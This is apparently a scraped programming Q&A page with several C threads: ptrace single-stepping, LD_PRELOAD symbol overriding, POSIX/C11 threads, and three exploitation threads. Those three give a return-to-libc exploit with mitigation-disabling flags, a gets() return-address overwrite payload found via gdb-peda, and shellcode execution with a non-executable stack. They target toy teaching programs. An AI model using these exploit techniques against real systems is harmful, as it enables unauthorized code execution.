Why doesn't ptrace SINGLESTEP work properly? - c

I am trying to trace a little program using ptrace API. I figured out that every time the tracer is run, it produces bad results. This is the disassembly of short program that I want to trace:
$ objdump -d -M intel inc_reg16
inc_reg16: file format elf32-i386
Disassembly of section .text:
08048060 <.text>:
8048060: b8 00 00 00 00 mov eax,0x0
8048065: 66 40 inc ax
8048067: 75 fc jne 0x8048065
8048069: 89 c3 mov ebx,eax
804806b: b8 01 00 00 00 mov eax,0x1
8048070: cd 80 int 0x80
and here is code of the tracer itself:
// ezptrace.c
#include <sys/user.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
int main() {
pid_t child;
child = fork();
if (child == 0) {
ptrace(PTRACE_TRACEME, 0, NULL, NULL);
execv("inc_reg16", NULL);
}
else {
int status;
wait(&status);
struct user_regs_struct regs;
while (1) {
ptrace(PTRACE_GETREGS, child, NULL, &regs);
printf("eip: %x\n", (unsigned int) regs.eip);
ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
waitpid(child, &status, 0);
if(WIFEXITED(status)) break;
}
printf("end\n");
}
return 0;
}
The tracer's job is to single step the inc_reg16 program and log address of each encountered processor instruction. When I run and check how many times the instruction 'inc ax' has been encountered, it occurs that the numbers are different each time the tracer is run:
$ gcc ezptrace.c -Wall -o ezptrace
$ ./ezptrace > inc_reg16.log
$ grep '8048065' inc_reg16.log | wc -l
65498
the second check:
$ ./ezptrace > inc_reg16.log
$ grep '8048065' inc_reg16.log | wc -l
65494
The problem is that above results should be both 65536, as the instruction 'inc ax' is executed exactly 65536 times. Now the question is: is there a mistake in my code or it's a matter of some bug in ptrace? Your help is greatly appreciated.

I tried the same program under both virtualbox and vmware, it seems that only vmware has the correct result, whereas virtualbox has the same problem as you. I used the virtualbox 4.2.1.

eip is the address to the "current instruction" in user space. You need a ptrace(...PEEKDATA, ...), i.e. following ptrace(...GETREGS, ...), to obtain the actual instruction. Also keep in mind that, with ptrace(...PEEKDATA, ...) you always obtain a machine word, actual opcodes usually only occupy the low 16/32 bits of it.

Related

Return to libc buffer overflow attack

I tried to make a return to libc buffer overflow. I found all the addresses for system, exit and /bin/sh, I don't know why, but when I try to run the vulnerable program nothing happens.
system, exit address
/bin/sh address
Vulnerable program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif
int bof(FILE* badfile)
{
char buffer[BUF_SIZE];
fread(buffer, sizeof(char), 300, badfile);
return 1;
}
int main(int argc, char** argv)
{
FILE* badfile;
char dummy[BUF_SIZE * 5];
badfile = fopen("badfile", "r");
bof(badfile);
printf("Return properly.\n");
fclose(badfile);
return 1;
}
Exploit program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buf[40];
FILE* badfile;
badfile = fopen("./badfile", "w");
*(long *) &buf[24] = 0xbffffe1e; // /bin/sh
*(long *) &buf[20] = 0xb7e369d0; // exit
*(long *) &buf[16] = 0xb7e42da0; // system
fwrite(buf, sizeof(buf), 1, badfile);
fclose(badfile);
return 1;
}
And this is the program that I use to find MYSHELL address(for /bin/sh)
#include <stdio.h>
void main()
{
char* shell = getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int) shell);
}
Terminal:
Terminal image after run retlib
First, there are a number of mitigations that might be deployed to prevent this attack. You need to disable each one:
ASLR: You have already disabled with sudo sysctl -w kernel.randomize_va_space=0. But a better option is to disable it only for one shell and its children: setarch $(uname -m) -R /bin/bash.
Stack protector: The compiler can place stack canaries between the buffer and the return address on the stack, write a value into it before the buffer write operation is executed, and then just before returning, verify that it has not been changed by the buffer write operation. This can be disabled with -fno-stack-protector.
Shadow stack: Newer processors might have a shadow stack feature (Intel CET) that when calling a function, stashes a copy of the return address away from the writable memory, which is checked against the return address when returning from the current function. This (and some other CET protections) can disabled with -fcf-protection=none.
The question does not mention it, but the addresses used in the code (along with use of long) indicate that a 32-bit system is targeted. If the system used is 64-bit, -m32 needs to be added to the compiler flags:
gcc -fno-stack-protector -fcf-protection=none -m32 vulnerable.c
When determining the environment variable address from one binary and using it in another, it is really important that their environment variables and invocation from shell are identical (at least in length). If one is executed as a.out, the other should also be executed as a.out. One being in a different path, having a different argv will move the environment variable.
Alternatively, you can print the address of the environment variable from within the vulnerable binary.
By looking at the disassembly of bof function, the distance between the buffer and the return address can be determined:
(gdb) disassemble bof
Dump of assembler code for function bof:
0x565561dd <+0>: push %ebp
0x565561de <+1>: mov %esp,%ebp
0x565561e0 <+3>: push %ebx
0x565561e1 <+4>: sub $0x14,%esp
0x565561e4 <+7>: call 0x56556286 <__x86.get_pc_thunk.ax>
0x565561e9 <+12>: add $0x2de3,%eax
0x565561ee <+17>: pushl 0x8(%ebp)
0x565561f1 <+20>: push $0x12c
0x565561f6 <+25>: push $0x1
0x565561f8 <+27>: lea -0x14(%ebp),%edx
0x565561fb <+30>: push %edx
0x565561fc <+31>: mov %eax,%ebx
0x565561fe <+33>: call 0x56556050 <fread#plt>
0x56556203 <+38>: add $0x10,%esp
0x56556206 <+41>: mov $0x1,%eax
0x5655620b <+46>: mov -0x4(%ebp),%ebx
0x5655620e <+49>: leave
0x5655620f <+50>: ret
End of assembler dump.
Note that -0x14(%ebp) is used as the first parameter to fread, which is the buffer that will be overflowed. Also note that ebp was the value of esp just after pushing ebp in the first instruction. So, ebp points to the saved ebp, which is followed by the return address. That means from the start of the buffer, saved ebp is 20 bytes away, and return address is 24 bytes away.
*(long *) &buf[32] = ...; // /bin/sh
*(long *) &buf[28] = ...; // exit
*(long *) &buf[24] = ...; // system
With these changes, the shell is executed by the vulnerable binary:
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709328 pts/1 00:00:00 ps
$ ./a.out
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709329 pts/1 00:00:00 a.out
1709330 pts/1 00:00:00 sh
1709331 pts/1 00:00:00 sh
1709332 pts/1 00:00:00 ps
$

LD_PRELOAD and linkage

I have this small testcode atfork_demo.c:
#include <stdio.h>
#include <pthread.h>
void hello_from_fork_prepare() {
printf("Hello from atfork prepare.\n");
fflush(stdout);
}
void register_hello_from_fork_prepare() {
pthread_atfork(&hello_from_fork_prepare, 0, 0);
}
Now, I compile it in two different ways:
gcc -shared -fPIC atfork_demo.c -o atfork_demo1.so
gcc -shared -fPIC atfork_demo.c -o atfork_demo2.so -lpthread
My demo main atfork_demo_main.c is this:
#include <dlfcn.h>
#include <stdio.h>
#include <unistd.h>
int main(int argc, const char** argv) {
if(argc <= 1) {
printf("usage: ... lib.so\n");
return 1;
}
void* plib = dlopen("libpthread.so.0", RTLD_NOW|RTLD_GLOBAL);
if(!plib) {
printf("cannot load pthread, error %s\n", dlerror());
return 1;
}
void* lib = dlopen(argv[1], RTLD_LAZY);
if(!lib) {
printf("cannot load %s, error %s\n", argv[1], dlerror());
return 1;
}
void (*reg)();
reg = dlsym(lib, "register_hello_from_fork_prepare");
if(!reg) {
printf("did not found func, error %s\n", dlerror());
return 1;
}
reg();
fork();
}
Which I compile like this:
gcc atfork_demo_main.c -o atfork_demo_main.exec -ldl
Now, I have another small demo atfork_patch.c where I want to override pthread_atfork:
#include <stdio.h>
int pthread_atfork(void (*prepare)(void), void (*parent)(void), void (*child)(void)) {
printf("Ignoring pthread_atfork call!\n");
fflush(stdout);
return 0;
}
Which I compile like this:
gcc -shared -O2 -fPIC patch_atfork.c -o patch_atfork.so
And then I set LD_PRELOAD=./atfork_patch.so, and do these two calls:
./atfork_demo_main.exec ./atfork_demo1.so
./atfork_demo_main.exec ./atfork_demo2.so
In the first case, the LD_PRELOAD-override of pthread_atfork worked and in the second, it did not. I get the output:
Ignoring pthread_atfork call!
Hello from atfork prepare.
So, now to the question(s):
Why did it not work in the second case?
How can I make it work also in the second case, i.e. also override it?
In my real use case, atfork_demo is some library which I cannot change. I also cannot change atfork_demo_main but I can make it load any other code. I would prefer if I can just do it with some change in atfork_patch.
You get some more debug output if you also use LD_DEBUG=all. Maybe interesting is this bit, for the second case:
841: symbol=__register_atfork; lookup in file=./atfork_demo_main.exec [0]
841: symbol=__register_atfork; lookup in file=./atfork_patch_extended.so [0]
841: symbol=__register_atfork; lookup in file=/lib/x86_64-linux-gnu/libdl.so.2 [0]
841: symbol=__register_atfork; lookup in file=/lib/x86_64-linux-gnu/libc.so.6 [0]
841: binding file ./atfork_demo2.so [0] to /lib/x86_64-linux-gnu/libc.so.6 [0]: normal symbol `__register_atfork' [GLIBC_2.3.2]
So, it searches for the symbol __register_atfork. I added that to atfork_patch_extended.so but it doesn't find it and uses it from libc instead. How can I make it find and use my __register_atfork?
As a side note, my main goal is to ignore the atfork handlers when fork() is called, but this is not the question here, but actually here. One solution to that, which seems to work, is to override fork() itself by this:
pid_t fork(void) {
return syscall(SYS_clone, SIGCHLD, 0);
}
Before answering this question, I would stress that this is a really bad idea for any production application.
If you are using a third party library that puts such constraints in place, then think about an alternative solution, such as forking early to maintain a "helper" process, with a pipe between you and it... then, when you need to call exec(), you can request that it does the work (fork(), exec()) on your behalf.
Patching or otherwise side-stepping the services of a system call such as pthread_atfork() is just asking for trouble (missed events, memory leaks, crashes, etc...).
As #Sergio pointed out, pthread_atfork() is actually built into atfork_demo2.so, so you can't do anything to override it... However examining the disassembly / source of pthread_atfork() gives you a decent hint about how achieve what you're asking:
0000000000000830 <__pthread_atfork>:
830: 48 8d 05 f9 07 20 00 lea 0x2007f9(%rip),%rax # 201030 <__dso_handle>
837: 48 85 c0 test %rax,%rax
83a: 74 0c je 848 <__pthread_atfork+0x18>
83c: 48 8b 08 mov (%rax),%rcx
83f: e9 6c fe ff ff jmpq 6b0 <__register_atfork#plt>
844: 0f 1f 40 00 nopl 0x0(%rax)
848: 31 c9 xor %ecx,%ecx
84a: e9 61 fe ff ff jmpq 6b0 <__register_atfork#plt>
or the source (from here):
int
pthread_atfork (void (*prepare) (void),
void (*parent) (void),
void (*child) (void))
{
return __register_atfork (prepare, parent, child, &__dso_handle == NULL ? NULL : __dso_handle);
}
As you can see, pthread_atfork() does nothing aside from calling __register_atfork()... so patch that instead!
The content of atfork_patch.c now becomes: (using __register_atfork()'s prototype, from here / here)
#include <stdio.h>
int __register_atfork (void (*prepare) (void), void (*parent) (void),
void (*child) (void), void *dso_handle) {
printf("Ignoring pthread_atfork call!\n");
fflush(stdout);
return 0;
}
This works for both demos:
$ LD_PRELOAD=./atfork_patch.so ./atfork_demo_main.exec ./atfork_demo1.so
Ignoring pthread_atfork call!
$ LD_PRELOAD=./atfork_patch.so ./atfork_demo_main.exec ./atfork_demo2.so
Ignoring pthread_atfork call!
It doesn't work for the second case because there is nothing to override. Your second library is linked statically with pthread library:
$ readelf --symbols atfork_demo1.so | grep pthread_atfork
7: 0000000000000000 0 NOTYPE GLOBAL DEFAULT UND pthread_atfork
54: 0000000000000000 0 NOTYPE GLOBAL DEFAULT UND pthread_atfork
$ readelf --symbols atfork_demo2.so | grep pthread_atfork
41: 0000000000000000 0 FILE LOCAL DEFAULT ABS pthread_atfork.c
47: 0000000000000830 31 FUNC LOCAL DEFAULT 12 __pthread_atfork
49: 0000000000000830 31 FUNC LOCAL DEFAULT 12 pthread_atfork
So it will use local pthread_atfork each time, regardless of LD_PRELOAD or any other loaded libraries.
How to overcome that? Looks like for described configuration it is not possible since you need to modify atfork_demo library or main executable anyway.

How can I exploit a buffer overflow?

I have a homework assignment to exploit a buffer overflow in the given program.
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
The professor wants us to exploit the input gets(). We are not suppose to modify the code in any way, only create a malicious input that will create a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!
Update:
I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:
gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp
With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp to rsp because I am on a 64-bit but that came up with the same result. Is there a work around to this or another way to find the address of buf?
Since buf is pointing to an array of characters that are of length 12, inputing anything with a length greater than 12 should result in buffer overflow.
First, you need to find the offset to overwrite the Instruction pointer register (EIP).
Use gdb + peda is very useful:
$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret
0x4005c9 <main>: push rbp
0x4005ca <main+1>: mov rbp,rsp
0x4005cd <main+4>: call 0x4005ae <goodFunctionUserInput>
0x4005d2 <main+9>: mov edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....
Now, you can overwrite the EIP register, the offset is 24 bytes. As in your homework just need print the "Gotcha!\n" string. Just jump to oopsIGotToTheBadFunction function.
Get the function address:
$ readelf -s bof
...
50: 0000000000400596 24 FUNC GLOBAL DEFAULT 13 oopsIGotToTheBadFunction
...
Make the exploit and got the results:
[manu#debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu#debian /tmp]$ ./bof < input
Gotcha!

Execution of function pointer to Shellcode

I'm trying to execute this simple opcode for exit(0) call by overwriting the return address of main.
The problem is I'm getting segmentation fault.
#include <stdio.h>
char shellcode[]= "/0xbb/0x14/0x00/0x00/0x00"
"/0xb8/0x01/0x00/0x00/0x00"
"/0xcd/0x80";
void main()
{
int *ret;
ret = (int *)&ret + 2; // +2 to get to the return address on the stack
(*ret) = (int)shellcode;
}
Execution result in Segmentation error.
[user1#fedo BOF]$ gcc -o ExitShellCode ExitShellCode.c
[user1#fedo BOF]$ ./ExitShellCode
Segmentation fault (core dumped)
This is the Objdump of the shellcode.a
[user1#fedo BOF]$ objdump -d exitShellcodeaAss
exitShellcodeaAss: file format elf32-i386
Disassembly of section .text:
08048054 <_start>:
8048054: bb 14 00 00 00 mov $0x14,%ebx
8048059: b8 01 00 00 00 mov $0x1,%eax
804805e: cd 80 int $0x80
System I'm using
fedora Linux 3.1.2-1.fc16.i686
ASLR is disabled.
Debugging with GDB.
gcc version 4.6.2
mmm maybe it is to late to answer to this question, but they might be a passive syntax error. It seems like thet shellcode is malformed, I mean:
char shellcode[]= "/0xbb/0x14/0x00/0x00/0x00"
"/0xb8/0x01/0x00/0x00/0x00"
"/0xcd/0x80";
its not the same as:
char shellcode[]= "\xbb\x14\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
although this fix won't help you solving this problem, but have you tried disabling some kernel protection mechanism like: NX bit, Stack Randomization, etc... ?
Based on two other questions, namely How to determine return address on stack? and C: return address of function (mac), i'm confident that you are not overwriting the correct address. This is basically caused due to your assumption, that the return address can be determined in the way you did it. But as the answer to thefirst question (1) states, this must not be the case.
Therefore:
Check if the address is really correct
Find a way for determining the correct return address, if you do not want to use the builtin GCC feature
You can also execute shellcode like in this scenario, by casting the buffer to a function like
(*(int(*)()) shellcode)();
If you want the shellcode be executed in the stack you must compile without NX (stack protector) and with correct permissions.
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
E.g.
#include <stdio.h>
#include <string.h>
const char code[] ="\xbb\x14\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
int main()
{
printf("Length: %d bytes\n", strlen(code));
(*(void(*)()) code)();
return 0;
}
If you want to debug it with gdb:
[manu#debian /tmp]$ gdb ./shellcode
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
...
Reading symbols from ./shellcode...(no debugging symbols found)...done.
(gdb) b *&code
Breakpoint 1 at 0x4005c4
(gdb) r
Starting program: /tmp/shellcode
Length: 2 bytes
Breakpoint 1, 0x00000000004005c4 in code ()
(gdb) disassemble
Dump of assembler code for function code:
=> 0x00000000004005c4 <+0>: mov $0x14,%ebx
0x00000000004005c9 <+5>: mov $0x1,%eax
0x00000000004005ce <+10>: int $0x80
0x00000000004005d0 <+12>: add %cl,0x6e(%rbp,%riz,2)
End of assembler dump.
In this proof of concept example is not important the null bytes. But when you are developing shellcodes you should keep in mind and remove the bad characters.
Shellcode cannot have Zeros on it. Remove the null characters.

How do I start threads in plain C?

I have used fork() in C to start another process. How do I start a new thread?
Since you mentioned fork() I assume you're on a Unix-like system, in which case POSIX threads (usually referred to as pthreads) are what you want to use.
Specifically, pthread_create() is the function you need to create a new thread. Its arguments are:
int pthread_create(pthread_t * thread, pthread_attr_t * attr, void *
(*start_routine)(void *), void * arg);
The first argument is the returned pointer to the thread id. The second argument is the thread arguments, which can be NULL unless you want to start the thread with a specific priority. The third argument is the function executed by the thread. The fourth argument is the single argument passed to the thread function when it is executed.
AFAIK, ANSI C doesn't define threading, but there are various libraries available.
If you are running on Windows, link to msvcrt and use _beginthread or _beginthreadex.
If you are running on other platforms, check out the pthreads library (I'm sure there are others as well).
C11 threads + C11 atomic_int
Added to glibc 2.28. Tested in Ubuntu 18.10 amd64 (comes with glic 2.28) and Ubuntu 18.04 (comes with glibc 2.27) by compiling glibc 2.28 from source: Multiple glibc libraries on a single host
Example adapted from: https://en.cppreference.com/w/c/language/atomic
main.c
#include <stdio.h>
#include <threads.h>
#include <stdatomic.h>
atomic_int atomic_counter;
int non_atomic_counter;
int mythread(void* thr_data) {
(void)thr_data;
for(int n = 0; n < 1000; ++n) {
++non_atomic_counter;
++atomic_counter;
// for this example, relaxed memory order is sufficient, e.g.
// atomic_fetch_add_explicit(&atomic_counter, 1, memory_order_relaxed);
}
return 0;
}
int main(void) {
thrd_t thr[10];
for(int n = 0; n < 10; ++n)
thrd_create(&thr[n], mythread, NULL);
for(int n = 0; n < 10; ++n)
thrd_join(thr[n], NULL);
printf("atomic %d\n", atomic_counter);
printf("non-atomic %d\n", non_atomic_counter);
}
GitHub upstream.
Compile and run:
gcc -ggdb3 -std=c11 -Wall -Wextra -pedantic -o main.out main.c -pthread
./main.out
Possible output:
atomic 10000
non-atomic 4341
The non-atomic counter is very likely to be smaller than the atomic one due to racy access across threads to the non-atomic variable.
See also: How to do an atomic increment and fetch in C?
Disassembly analysis
Disassemble with:
gdb -batch -ex "disassemble/rs mythread" main.out
contains:
17 ++non_atomic_counter;
0x00000000004007e8 <+8>: 83 05 65 08 20 00 01 addl $0x1,0x200865(%rip) # 0x601054 <non_atomic_counter>
18 __atomic_fetch_add(&atomic_counter, 1, __ATOMIC_SEQ_CST);
0x00000000004007ef <+15>: f0 83 05 61 08 20 00 01 lock addl $0x1,0x200861(%rip) # 0x601058 <atomic_counter>
so we see that the atomic increment is done at the instruction level with the f0 lock prefix.
With aarch64-linux-gnu-gcc 8.2.0, we get instead:
11 ++non_atomic_counter;
0x0000000000000a28 <+24>: 60 00 40 b9 ldr w0, [x3]
0x0000000000000a2c <+28>: 00 04 00 11 add w0, w0, #0x1
0x0000000000000a30 <+32>: 60 00 00 b9 str w0, [x3]
12 ++atomic_counter;
0x0000000000000a34 <+36>: 40 fc 5f 88 ldaxr w0, [x2]
0x0000000000000a38 <+40>: 00 04 00 11 add w0, w0, #0x1
0x0000000000000a3c <+44>: 40 fc 04 88 stlxr w4, w0, [x2]
0x0000000000000a40 <+48>: a4 ff ff 35 cbnz w4, 0xa34 <mythread+36>
so the atomic version actually has a cbnz loop that runs until the stlxr store succeed. Note that ARMv8.1 can do all of that with a single LDADD instruction.
This is analogous to what we get with C++ std::atomic: What exactly is std::atomic?
Benchmark
TODO. Crate a benchmark to show that atomic is slower.
POSIX threads
main.c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <stdlib.h>
#include <pthread.h>
enum CONSTANTS {
NUM_THREADS = 1000,
NUM_ITERS = 1000
};
int global = 0;
int fail = 0;
pthread_mutex_t main_thread_mutex = PTHREAD_MUTEX_INITIALIZER;
void* main_thread(void *arg) {
int i;
for (i = 0; i < NUM_ITERS; ++i) {
if (!fail)
pthread_mutex_lock(&main_thread_mutex);
global++;
if (!fail)
pthread_mutex_unlock(&main_thread_mutex);
}
return NULL;
}
int main(int argc, char **argv) {
pthread_t threads[NUM_THREADS];
int i;
fail = argc > 1;
for (i = 0; i < NUM_THREADS; ++i)
pthread_create(&threads[i], NULL, main_thread, NULL);
for (i = 0; i < NUM_THREADS; ++i)
pthread_join(threads[i], NULL);
assert(global == NUM_THREADS * NUM_ITERS);
return EXIT_SUCCESS;
}
Compile and run:
gcc -std=c99 -Wall -Wextra -pedantic -o main.out main.c -pthread
./main.out
./main.out 1
The first run works fine, the second fails due to missing synchronization.
There don't seem to be POSIX standardized atomic operations: UNIX Portable Atomic Operations
Tested on Ubuntu 18.04. GitHub upstream.
GCC __atomic_* built-ins
For those that don't have C11, you can achieve atomic increments with the __atomic_* GCC extensions.
main.c
#define _XOPEN_SOURCE 700
#include <pthread.h>
#include <stdatomic.h>
#include <stdio.h>
#include <stdlib.h>
enum Constants {
NUM_THREADS = 1000,
};
int atomic_counter;
int non_atomic_counter;
void* mythread(void *arg) {
(void)arg;
for (int n = 0; n < 1000; ++n) {
++non_atomic_counter;
__atomic_fetch_add(&atomic_counter, 1, __ATOMIC_SEQ_CST);
}
return NULL;
}
int main(void) {
int i;
pthread_t threads[NUM_THREADS];
for (i = 0; i < NUM_THREADS; ++i)
pthread_create(&threads[i], NULL, mythread, NULL);
for (i = 0; i < NUM_THREADS; ++i)
pthread_join(threads[i], NULL);
printf("atomic %d\n", atomic_counter);
printf("non-atomic %d\n", non_atomic_counter);
}
Compile and run:
gcc -ggdb3 -O3 -std=c99 -Wall -Wextra -pedantic -o main.out main.c -pthread
./main.out
Output and generated assembly: the same as the "C11 threads" example.
Tested in Ubuntu 16.04 amd64, GCC 6.4.0.
pthreads is a good start, look here
Threads are not part of the C standard, so the only way to use threads is to use some library (eg: POSIX threads in Unix/Linux, _beginthread/_beginthreadex if you want to use the C-runtime from that thread or just CreateThread Win32 API)
Check out the pthread (POSIX thread) library.

Resources